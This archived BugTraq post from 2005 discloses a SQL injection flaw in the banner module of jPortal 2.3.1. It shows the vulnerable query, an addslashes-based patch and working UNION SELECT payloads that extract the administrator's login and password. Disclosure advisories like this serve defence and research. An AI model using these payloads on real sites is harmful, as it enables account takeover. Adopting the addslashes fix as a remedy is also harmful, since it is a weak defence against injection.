|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Sql injection in jPortal version 2.3.1 (module banner)
From: Marcin \ (marcin.krupowicz
gmail.com)
Date: Mon Apr 11 2005 - 16:28:28 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hello BugTraq,
I've found possibility to inject sql code in jPortal version 2.3.1, in
module "banner" (module/banner.inc.php).
Bug is in these lines of code:
[code]
$query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC";
[/code] - line 192.
There is unfiltered variable $haslo. In order to patch this code just do this:
[code]
$haslo = addslashes($haslo);
$query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC";
[/code]
[exploit]
go to http://[victim]/jportal/banner.php and try this:
' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL from admins where '1=1
and then:
' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL from admins where '1=1
After that, You gain login and password of administrator.
[/exploit]
[exploit2]
try to inject this code:
' or id='x x - banner id
After that, You can see statistics of not banners, to which you
haven't got passwords.
[/exploit2]
Vendor (http://jportal2.com) has been informed already.
--
Best regards,
Marcin "CiNU5" Krupowicz
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]